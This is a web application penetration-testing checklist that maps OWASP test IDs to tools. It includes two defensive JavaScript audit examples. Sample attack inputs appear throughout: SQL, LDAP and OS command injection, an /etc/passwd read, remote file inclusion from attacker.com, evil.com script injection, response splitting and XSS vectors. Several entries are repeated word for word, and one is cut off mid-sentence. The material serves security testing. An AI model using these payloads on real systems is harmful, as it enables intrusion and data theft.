Developed by BugXHunter

Penetration Testing Methodology

The below methodology is a combination of several operational penetration testing methodologies. Represented is the OWASP Testing Guide methodology (abbreviated as WSTG), The Web Application Hacker’s Handbook methodology (abbreviated as WAHHM), and BugXHunter’s own Vulnerability Rating Taxonomy classifications (abbreviated as VRT). These three resources are the de-facto standards for infrastructure and application testing professionals.

Each section is tested by the BugXHunter penetration tester and presented here. To satisfy PCI DSS requirements, both automated and manual testing are performed in this methodology, and the common tools used in each check are listed in the “Example Tools” column.

Penetration testing is completed as per the following checks.

Operational Methodology Checks

1. Information Gathering

Columns: Methodology Section (WSTG / WAHHM / VRT references), Test Description, Example Tools

WSTG-INFO-01
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure
Test Description: Use search engines to find sensitive information on websites and web applications that may be exposed due to missing or misconfigured controls like robots.txt or meta tags. Utilise search operators and advanced techniques, such as Google hacking or dorking, to locate data like network configurations, login details, or confidential files.
Example Tools: Google Hacking, DuckDuckGo, Sitedigger, Shodan, FOCA, Punkspider

WSTG-INFO-02
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration
Test Description: Identify the type and version of the web server that the target application runs on, to determine known vulnerabilities and the appropriate exploits. The test can be performed using HTTP header field ordering, banner grabbing, sending malformed requests to observe error responses, or using automated scanning tools that probe the server and compare its responses to a database of known signatures.
Example Tools: Netcraft, Nikto, Nmap, Telnet, OpenSSL, Httprecon, httprint, WhatWeb, Wappalyzer, Netcat, Amap

WSTG-INFO-03
WAHHM – Recon and Analysis
Test Description: Analyse robots.txt and identify <META> tags on the website.
Example Tools: Browser, curl, wget

WSTG-INFO-04
WAHHM – Recon and Analysis
Test Description: Find applications hosted on the web server (virtual hosts/subdomains), non-standard ports, DNS zone transfers.
Example Tools: Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue

WSTG-INFO-05
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure
Test Description: Find sensitive information in webpage comments and in metadata in the source code.
Example Tools: Browser, curl, wget

WSTG-INFO-06
WAHHM – Recon and Analysis
Test Description: Identify hidden fields, parameters and methods through HTTP header analysis.
Example Tools: Burp Proxy, ZAP, Tamper Data

WSTG-INFO-07
WAHHM – Recon and Analysis
Test Description: Map the target application and understand the principal workflows.
Example Tools: ZAP, Burp Proxy

WSTG-INFO-08
WAHHM – Recon and Analysis
Test Description: Find the type of web application framework/CMS from HTTP headers, cookies, source code, specific files and folders.
Example Tools: WhatWeb, BlindElephant, Wappalyzer

WSTG-INFO-09
WAHHM – Recon and Analysis
VRT Category – Several
Test Description: Identify the web application and its version to determine known vulnerabilities and the appropriate exploits.
Example Tools: WhatWeb, BlindElephant, Wappalyzer, CMSmap

WSTG-INFO-10
WAHHM – Recon and Analysis
Test Description: Identify the application architecture, including web language, WAF, reverse proxy, application server and backend database.
Example Tools: Browser, curl, wget

2. Configuration and Deploy Management Testing

WSTG-CONFIG-01
WAHHM – Recon and Analysis, Assess Application Hosting
VRT Category – Server Security Misconfiguration
Test Description: Understand the interactions between infrastructure elements, configuration management for software, backend DB server, WebDAV and FTP in order to identify known vulnerabilities.
Example Tools: Nessus

WSTG-CONFIG-02
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration
Test Description: Identify default installation files/directories, handling of server errors (40*, 50*), minimal privilege, software logging.
Example Tools: Browser, Nikto

WSTG-CONFIG-03
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure
Test Description: Find important files and information (.asa, .inc, .sql, zip, tar, pdf, txt, etc.).
Example Tools: Browser, Nikto

WSTG-CONFIG-04
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure
Test Description: Check JS source code, comments, cache files, backup files (.old, .bak, .inc, .src) and guess filenames.
Example Tools: Nessus, Nikto, Wikto

WSTG-CONFIG-05
WAHHM – Recon and Analysis
Test Description: Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc.), alternative server port (Tomcat/8080).
Example Tools: Burp Proxy, dirb, DirBuster, fuzzdb, Tilde Scanner

WSTG-CONFIG-06
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Identify the HTTP methods allowed on the web server with OPTIONS. Arbitrary HTTP methods, HEAD access control bypass and XST.
Example Tools: netcat, curl

WSTG-CONFIG-07
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Identify the HSTS header on the web server through the HTTP response headers:

curl -s -D- https://domain.com/ | grep Strict

Example Tools: Burp Proxy, ZAP, curl

WSTG-CONFIG-08
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Analyse the permissions allowed by the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.
Example Tools: Nikto, OWASP Zed Attack Proxy Project, W3af

3. Identity Management Testing

WSTG-IDENT-01
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)
Test Description: Validate the system roles defined within the application by creating a permission matrix.
Example Tools: Burp Proxy, ZAP

WSTG-IDENT-02
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Verify that the identity requirements for user registration are aligned with business and security requirements.
Example Tools: Burp Proxy, ZAP

WSTG-IDENT-03
WAHHM – Test Handling of Access
Test Description: Determine which roles are able to provision users and what sort of accounts they can provision.
Example Tools: Burp Proxy, ZAP

WSTG-IDENT-04
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Generic login error statement check, return codes/parameter values, enumeration of all possible valid user IDs (login system, forgot password).
Example Tools: Browser, Burp Proxy, ZAP

WSTG-IDENT-05
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: User account names are often highly structured (e.g. Joe Bloggs's account name is jbloggs and Fred Nurks's account name is fnurks), so valid account names can easily be guessed.
Example Tools: Browser, Burp Proxy, ZAP

WSTG-IDENT-06
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Guest and training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access. Evaluate consistency between the access policy and guest/training account access permissions.
Example Tools: Burp Proxy, ZAP

WSTG-IDENT-07
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Guest and training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access. Evaluate consistency between the access policy and guest/training account access permissions.
Example Tools: Burp Proxy, ZAP

4. Authentication Testing

WSTG-AUTHN-001
WAHHM – Miscellaneous Tests
VRT Category – Broken Authentication and Session Management
Test Description: Check whether the referrer is HTTP or HTTPS. Sending data through HTTP and HTTPS.
Example Tools: Burp Proxy, ZAP

WSTG-AUTHN-002
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Testing for default credentials of common applications; testing for default passwords of new accounts.
Example Tools: Burp Proxy, ZAP, Hydra

WSTG-AUTHN-003
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. Evaluate the unlock mechanism's resistance to unauthorised account unlocking.
Example Tools: Browser

WSTG-AUTHN-004
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Forced browsing (/admin/main.php, /page.asp?authenticated=yes), parameter modification, session ID prediction, SQL injection.
Example Tools: Burp Proxy, ZAP

WSTG-AUTHN-005
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Is autocomplete=off set on credential fields?
Example Tools: Burp Proxy, ZAP

WSTG-AUTHN-006
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration
Test Description: Check for the browser history issue by clicking the “Back” button after logging out. Check for the browser cache issue from the HTTP response headers (Cache-Control: no-cache).
Example Tools: Burp Proxy, ZAP, Firefox add-on CacheViewer2

WSTG-AUTHN-007
WAHHM – Test Handling of Access
VRT Category – Insufficient Security Configurability
Test Description: Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.
Example Tools: Burp Proxy, ZAP, Hydra

WSTG-AUTHN-008
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Testing for weak pre-generated questions; testing for weak self-generated questions; testing for brute-forcible answers (unlimited attempts?).
Example Tools: Browser

WSTG-AUTHN-009
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Test password reset (is the old password displayed in plain text? is it sent via email? is there a random token in the confirmation email?), test password change (is the old password required?), CSRF vulnerability?
Example Tools: Browser, Burp Proxy, ZAP

WSTG-AUTHN-010
WAHHM – Test Handling of Access
Test Description: Understand the primary mechanism and identify other channels (mobile app, call centre, SSO).
Example Tools: Browser

5. Authorisation Testing

WSTG-AUTHZ-001
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Dot-dot-slash attack (../), directory traversal, local file inclusion/remote file inclusion.
Example Tools: Burp Proxy, ZAP, Wfuzz

WSTG-AUTHZ-002
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)
Test Description: Can a resource be accessed without authentication? Bypass ACL, forced browsing (/admin/adduser.jsp).
Example Tools: Burp Proxy (Autorize), ZAP

WSTG-AUTHZ-003
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Testing for role/privilege escalation by manipulating the values of hidden variables, e.g. changing a parameter groupid=2 to groupid=1.
Example Tools: Burp Proxy (Autorize), ZAP

WSTG-AUTHZ-004
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)
Test Description: Force a change of parameter value (?invoice=123 -> ?invoice=456).
Example Tools: Burp Proxy (Autorize), ZAP

6. Session Management Testing

WSTG-SESS-01
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Session ID analysis and prediction, unencrypted cookie transport, brute force.
Example Tools: Burp Proxy, ForceSSL, ZAP, CookieDigger

WSTG-SESS-02
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Check the HttpOnly and Secure flags and the expiration; inspect cookies for sensitive data.
Example Tools: Burp Proxy, ZAP
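The header checks in WSTG-CONFIG-07 (HSTS), WSTG-AUTHN-006 (cache headers) and WSTG-SESS-02 (cookie flags) can be scripted over the raw response that `curl -s -D-` prints. The following is an added example, not BugXHunter's tooling; the one-year HSTS minimum and the rule that a response setting a cookie must carry `Cache-Control: no-store` are assumptions chosen for this check, and the two responses are constructed.

```javascript
// Added example: audit a captured HTTP response for the header-level checks in
// WSTG-CONFIG-07 (HSTS), AUTHN-006 (cache headers) and SESS-02 (cookie flags).
// Input is the raw response text exactly as `curl -s -D-` prints it.

const ONE_YEAR = 31536000; // seconds; assumed minimum HSTS max-age for this check

// Parse the status line and header block. Set-Cookie may repeat, so every header
// is kept as a list of values keyed by its lower-cased name.
function parseResponseHeaders(raw) {
  const lines = raw.split(/\r?\n/);
  const status = parseInt((lines[0].match(/^HTTP\/\d(?:\.\d)?\s+(\d{3})/) || [])[1], 10);
  const headers = {};
  for (const line of lines.slice(1)) {
    if (line.trim() === '') break;            // blank line ends the header block
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    (headers[name] = headers[name] || []).push(value);
  }
  return { status, headers };
}

// CONFIG-07: HSTS must be present, long-lived and should cover subdomains.
function checkHsts(headers) {
  const findings = [];
  const hsts = (headers['strict-transport-security'] || [])[0];
  if (!hsts) return ['HSTS: Strict-Transport-Security header missing'];
  const m = hsts.match(/max-age=(\d+)/i);
  const maxAge = m ? parseInt(m[1], 10) : 0;
  if (maxAge < ONE_YEAR) findings.push(`HSTS: max-age ${maxAge} is below ${ONE_YEAR}`);
  if (!/includeSubDomains/i.test(hsts)) findings.push('HSTS: includeSubDomains not set');
  return findings;
}

// SESS-02: every cookie needs Secure, HttpOnly and a SameSite attribute; a Max-Age
// beyond one year on a cookie is also reported as an expiration finding.
function checkCookies(headers) {
  const findings = [];
  for (const raw of headers['set-cookie'] || []) {
    const parts = raw.split(';').map(p => p.trim());
    const name = parts[0].split('=')[0];
    const attrs = parts.slice(1).map(p => p.toLowerCase());
    if (!attrs.includes('secure')) findings.push(`Cookie ${name}: Secure flag missing`);
    if (!attrs.includes('httponly')) findings.push(`Cookie ${name}: HttpOnly flag missing`);
    if (!attrs.some(a => a.startsWith('samesite='))) findings.push(`Cookie ${name}: SameSite not set`);
    const maxAge = attrs.find(a => a.startsWith('max-age='));
    if (maxAge && parseInt(maxAge.split('=')[1], 10) > ONE_YEAR) {
      findings.push(`Cookie ${name}: Max-Age longer than one year`);
    }
  }
  return findings;
}

// AUTHN-006: a response that sets a cookie is treated as authenticated content and
// should carry Cache-Control: no-store so the Back button cannot replay it from cache.
function checkCache(headers) {
  if (!(headers['set-cookie'] || []).length) return [];
  const cc = ((headers['cache-control'] || [])[0] || '').toLowerCase();
  return /no-store/.test(cc) ? [] : ['Cache: Cache-Control lacks no-store on a response that sets a cookie'];
}

// Run all three checks and return the combined list of findings (empty = clean).
function auditResponse(raw) {
  const { headers } = parseResponseHeaders(raw);
  return [...checkHsts(headers), ...checkCookies(headers), ...checkCache(headers)];
}

// Constructed sample responses (not captured from any real host).
const WEAK_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Strict-Transport-Security: max-age=300',
  'Set-Cookie: JSESSIONID=abc123; Path=/',
  'Cache-Control: private',
  '',
  '<html>...</html>',
].join('\r\n');

const HARDENED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Strict-Transport-Security: max-age=63072000; includeSubDomains; preload',
  'Set-Cookie: JSESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'Cache-Control: no-store',
  '',
].join('\r\n');

console.log('weak:', auditResponse(WEAK_RESPONSE));          // six findings
console.log('hardened:', auditResponse(HARDENED_RESPONSE));  // []
```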
WSTG-SESS-03
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: The application doesn't renew the cookie after successful user authentication.
Example Tools: Burp Proxy, ZAP

WSTG-SESS-04
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Encryption and reuse of session token vulnerabilities; is the session ID sent with the GET method?
Example Tools: Burp Proxy, ZAP

WSTG-SESS-05
WAHHM – Test Handling of Access
VRT Category – Cross-Site Request Forgery (CSRF)
Test Description: URL analysis, direct access to functions without any token.
Example Tools: Burp Proxy (csrf_token_detect), burpy, ZAP

WSTG-SESS-06
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Check for reuse of the session after logout, both server-side and SSO.
Example Tools: Burp Proxy, ZAP

WSTG-SESS-07
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Check the session timeout; after the timeout has passed, all session tokens should be destroyed or be unusable.
Example Tools: Burp Proxy, ZAP

WSTG-SESS-08
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers, so that the session variable is set in one context and then used in another.
Example Tools: Burp Proxy, ZAP

7. Data Validation Testing

WSTG-INPV-01
WAHHM – Test Handling of Input
Test Description: Check for input validation; replace the vector used to identify XSS; XSS with HTTP parameter pollution.
Example Tools: Burp Proxy, ZAP, Xenotix XSS

WSTG-INPV-02
WAHHM – Test Handling of Input
VRT Category – Cross-Site Scripting (XSS)
Test Description: Check input forms/upload forms and analyse the HTML code; leverage XSS with BeEF.
Example Tools: Burp Proxy, ZAP, BeEF, XSS Proxy

WSTG-INPV-03
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration
Test Description: Craft custom HTTP requests to test the other methods to bypass URL authentication and authorisation.
Example Tools: netcat

WSTG-INPV-04
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Identify any form or action that allows user-supplied input to bypass input validation and filters using HPP.
Example Tools: ZAP, HPP Finder (Chrome plugin)

WSTG-INPVAL-005
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Union, Boolean, error-based, out-of-band, time delay.
Example Tools: Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)
  • Oracle testing: identify URLs for PL/SQL web applications, access via PL/SQL packages, bypass the PL/SQL exclusion list, SQL injection. Tools: Orascan, SQLInjector
  • MySQL testing: identify the MySQL version, single quote, information_schema, read/write file. Tools: SQLMap, Mysqloit, Power Injector
  • SQL Server testing: comment operator (--), query separator (;), stored procedures (xp_cmdshell). Tools: SQLMap, SQLninja, Power Injector
  • PostgreSQL testing: determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/write file, shell injection (OS command). Tools: SQLMap
  • MS Access testing: enumerate the columns through error-based (GROUP BY) queries; obtain the database schema combined with fuzzdb. Tools: SQLMap
  • Testing for NoSQL injection: identify NoSQL databases, pass special characters (' " \ ; { }), attack with reserved variable names and operators. Tools: NoSQLMap

WSTG-INPV-06
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: LDAP injection, e.g. /ldapsearch?user=* and user=*user=*)(uid=*))(|(uid=* pass=password
Example Tools: ZAP, Burp Proxy

WSTG-INPV-07
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Testing ORM injection is identical to SQL injection testing.
Example Tools: Hibernate, NHibernate

WSTG-INPV-08
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Check with XML meta characters: ', ", <>, <!-- / -->, &, <![CDATA[ / ]]>, XXE, TAG.
Example Tools: Burp Proxy, ZAP, Wfuzz

WSTG-INPV-09
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description:
  • Presence of the .shtml extension
  • Check for these characters: < ! # = / . " - > and [a-zA-Z0-9]
  • Include string: <!--#include virtual="/etc/passwd" -->
Example Tools: Burp Proxy, ZAP

WSTG-INPV-10
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Check for XML error enumeration by supplying a single quote ('), e.g. Username: ' or '1' = '1 and Password: ' or '1' = '1
Example Tools: Burp Proxy, ZAP

WSTG-INPV-11
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description:
  • Identifying vulnerable parameters with special characters (i.e. \, ', ", @, #, !, |)
  • Understanding the data flow and deployment structure of the client
  • IMAP/SMTP command injection (header, body, footer)
Example Tools: Burp Proxy, ZAP

WSTG-INPV-12
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Enter OS commands in the input field, e.g. ?arg=1; system('id')
Example Tools: Burp Proxy, ZAP, Liffy, Panoptic
  • Testing for local file inclusion: LFI with dot-dot-slash (../../), PHP wrapper (php://filter/convert.base64-encode/resource). Tools: Burp Proxy, fimap, Liffy
  • Testing for remote file inclusion: RFI from a malicious URL, e.g. ?page.php?file=http://attacker.com/malicious_page. Tools: Burp Proxy, fimap, Liffy

WSTG-INPV-13
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Understand the application platform, OS, folder structure and relative paths, and execute OS commands on the web server. Example payloads: %3Bcat%20/etc/passwd and test.pdf+|+Dir C:\
Example Tools: Burp Proxy, ZAP, Commix

WSTG-INPV-14
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description:
  • Testing for heap overflow vulnerabilities
  • Testing for stack overflow vulnerabilities
  • Testing for format string vulnerabilities
Example Tools: Immunity Canvas, Spike, MSF, Nessus

WSTG-INPV-15
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration
Test Description: File upload, stored XSS, SQL/XPath injection, misconfigured servers (Tomcat, Plesk, cPanel).
Example Tools: Burp Proxy, BeEF, MSF

WSTG-INPV-16
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Example payload injected into a parameter: param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>
Example Tools: Burp Proxy, ZAP, netcat

8. Error Handling

WSTG-ERR-01
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration
Test Description: Locate error codes generated by applications or web servers. Collect sensitive information from those errors (web server, application server, database).
Example Tools: Burp Proxy, ZAP

WSTG-ERR-02
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration
Test Description:
  • Invalid input / empty inputs
  • Input that contains non-alphanumeric characters or query syntax
  • Access to internal pages without authentication
  • Bypassing the application flow
Example Tools: Burp Proxy, ZAP

9. Cryptography

WSTG-CRYPST-01
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration
Test Description: Identify the SSL service; identify weak ciphers/protocols (e.g. RC4, BEAST, CRIME, POODLE).
Example Tools: testssl.sh, SSL Breacher

WSTG-CRYPST-02
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Compare the responses in three different states:
  • The cipher text gets decrypted and the resulting data is correct.
  • The cipher text gets decrypted, but the resulting data is garbled and causes some exception or error handling in the application logic.
  • Cipher text decryption fails due to padding errors.
Example Tools: testssl.sh, PadBuster, Poracle, python-paddingoracle, POET

WSTG-CRYPST-03
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management
Test Description: Check sensitive data during transmission:
  • Information used in authentication (e.g. credentials, PINs, session identifiers, tokens, cookies)
  • Information protected by laws, regulations or specific organisational policy (e.g. credit cards, customer data)
Example Tools: Burp Proxy, ZAP, curl

10. Business logic Testing

WSTG-BUSLOGIC-01
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
Test Description:
  • Look for data entry points or hand-off points between systems or software.
  • Once found, try to insert logically invalid data into the application/system.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-02
WAHHM – Test for Logic Flaws
VRT Category – Server-Side Injection
Test Description:
  • Look for guessable, predictable or hidden functionality of fields.
  • Once found, try to insert logically valid data into the application/system that allows the user to go through the application/system against the normal business logic workflow.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-03
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
Test Description:
  • Look for parts of the application/system (components, for example input fields, databases or logs) that move, store or handle data/information.
  • For each identified component, determine what type of data/information is logically acceptable and what types the application/system should guard against. Also consider who, according to the business logic, is allowed to insert, update and delete data/information in each component.
  • Attempt to insert, update, edit or delete the data/information values with invalid data/information in each component (i.e. input, database, or log) as users that should not be allowed to per the business logic workflow.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-04
WAHHM – Test for Logic Flaws
VRT Category – Server-Side Injection
Test Description:
  • Look for application/system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.
  • Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on any timing.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-05
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
Test Description:
  • Look for functions or features in the application or system that should not be executed more than a single time or a specified number of times during the business logic workflow.
  • For each of the functions and features found that should only be executed a single time or a specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute them more than the allowable number of times.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-06
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
Test Description:
  • Look for methods to skip steps, or go to steps in the application process in a different order from the designed/intended business logic flow.
  • For each method, develop a misuse case and try to circumvent or perform an action that is “not acceptable” per the business logic workflow.
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-07
WAHHM – Test for Logic Flaws
Test Description: Measures that might indicate the application has in-built self-defence:
  • Changed responses
  • Blocked requests
  • Actions that log a user out or lock their account
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-08
WAHHM – Test for Logic Flaws
Test Description:
  • Review the project documentation and perform some exploratory testing looking for file types that should be “unsupported” by the application/system.
  • Try to upload these “unsupported” files and verify that they are properly rejected.
  • If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.
  Examples: file.phtml, shell.phPWND, SHELL~1.PHP
Example Tools: Burp Proxy, ZAP

WSTG-BUSLOGIC-09
WAHHM – Test for Logic Flaws
VRT Category – Server Security Misconfiguration
Test Description:
  • Develop or acquire a known “malicious”
  • Try to upload the malicious file to the application/system and verify that it is correctly
  • If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.
Example Tools: Burp Proxy, ZAP

11. Client Side Testing

WSTG-CLIENT-01
WAHHM – Miscellaneous Tests
VRT Category – Cross-Site Scripting (XSS)
Test Description: Test the user inputs obtained from client-side JavaScript objects.
Example Tools: Burp Proxy, DOMinator

WSTG-CLIENT-02
WAHHM – Test Handling of Input
VRT Category – Cross-Site Scripting (XSS)
Test Description: Inject JavaScript code, e.g. www.victim.com/?javascript:alert(1)
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-03
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Send malicious HTML code, e.g. ?user=<img%20src='aaa'%20onerror=alert(1)>
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-04
WAHHM – Test Handling of Input
VRT Category – Unvalidated Redirects and Forwards
Test Description: Modify untrusted URL input to point at a malicious site (open redirect), e.g. ?redirect=www.fake-target.site
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-05
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
Test Description: Inject code in the CSS context:
  • www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
  • www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-06
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration
Test Description: External JavaScript could easily be injected into the trusted web site, e.g. www.victim.com/#http://evil.com/js.js
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-07
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration
Test Description: Check the HTTP headers in order to understand how CORS is used (Origin header).
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-08
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration
Test Description: Decompile, undefined variables, unsafe methods, inclusion of a malicious SWF (http://victim/file.swf?lang=http://evil).
Example Tools: FlashBang, Flare, Flasm, SWFScan, SWF Intruder

WSTG-CLIENT-09
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration
Test Description: Decompile, undefined variables, unsafe methods, inclusion of a malicious SWF (http://victim/file.swf?lang=http://evil).
Example Tools: Burp Proxy

WSTG-CLIENT-10
WAHHM – Test Handling of Input
Test Description: Determine whether the website is storing sensitive data in local storage. XSS in localStorage, e.g. http://server/StoragePOC.html#<img src=x onerror=alert(1)>
Example Tools: Chrome, Firebug, Burp Proxy, ZAP

WSTG-CLIENT-11
WAHHM – Test Handling of Input
Test Description: Analyse the JavaScript code to see how Web Messaging is implemented: how the website restricts messages from untrusted domains, and how the data is handled even for trusted domains.
Example Tools: Burp Proxy, ZAP

WSTG-CLIENT-12
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration
Test Description: Analyse the JavaScript code to see how Web Messaging is implemented: how the website restricts messages from untrusted domains, and how the data is handled even for trusted domains.
Example Tools: Burp Proxy, ZAP
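The two questions the Web Messaging checks (WSTG-CLIENT-11/12) ask of a `message` listener, origin restriction and payload handling, look like this in code. This is an added example, not code from the BugXHunter methodology: the allow-listed origin, the message shape (`type`/`name`) and the three events are constructed, and the handlers are written as pure functions of an event-like object so the comparison runs without a browser.

```javascript
// Added example: a postMessage listener that fails both CLIENT-11/12 questions,
// next to a hardened one. The origin and message format below are assumptions.

const ALLOWED_ORIGINS = ['https://app.example.test']; // assumed trusted origin

// Vulnerable pattern: no event.origin check, and the string is used as HTML.
function handleMessageWeak(event) {
  return { accepted: true, html: String(event.data) }; // would become element.innerHTML
}

// Hardened pattern, covering both review questions from the check:
//  1. compare event.origin exactly against an allow-list (no startsWith / indexOf);
//  2. validate the message shape even when the origin is trusted;
//  3. only ever use the payload as text, never as markup.
function handleMessageHardened(event, allowedOrigins = ALLOWED_ORIGINS) {
  if (!allowedOrigins.includes(event.origin)) {
    return { accepted: false, reason: `untrusted origin ${event.origin}` };
  }
  let msg;
  try {
    msg = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  } catch (e) {
    return { accepted: false, reason: 'payload is not JSON' };
  }
  if (!msg || typeof msg !== 'object' || msg.type !== 'setGreeting' || typeof msg.name !== 'string') {
    return { accepted: false, reason: 'unexpected message shape' };
  }
  if (msg.name.length > 64) return { accepted: false, reason: 'name too long' };
  return { accepted: true, text: `Hello, ${msg.name}` }; // would become element.textContent
}

// A prefix comparison is the common near-miss when reviewing origin checks: it also
// accepts look-alike origins that merely begin with the trusted one.
function originLooksTrustedNaive(origin) {
  return origin.startsWith('https://app.example.test');
}

// Constructed events (not captured from any real site).
const FROM_TRUSTED = {
  origin: 'https://app.example.test',
  data: JSON.stringify({ type: 'setGreeting', name: 'Ada' }),
};
const FROM_LOOKALIKE = {
  origin: 'https://app.example.test.evil.example',
  data: '<img src=x onerror=alert(1)>',
};
const MALFORMED = { origin: 'https://app.example.test', data: '{"type":"other"}' };

console.log('weak  :', handleMessageWeak(FROM_LOOKALIKE));        // accepted, carries markup
console.log('strict:', handleMessageHardened(FROM_LOOKALIKE));    // rejected: untrusted origin
console.log('strict:', handleMessageHardened(FROM_TRUSTED));      // accepted: "Hello, Ada"
```

In a page the hardened handler is wired as `window.addEventListener('message', e => render(handleMessageHardened(e)))`, with `render` writing `text` via `textContent`.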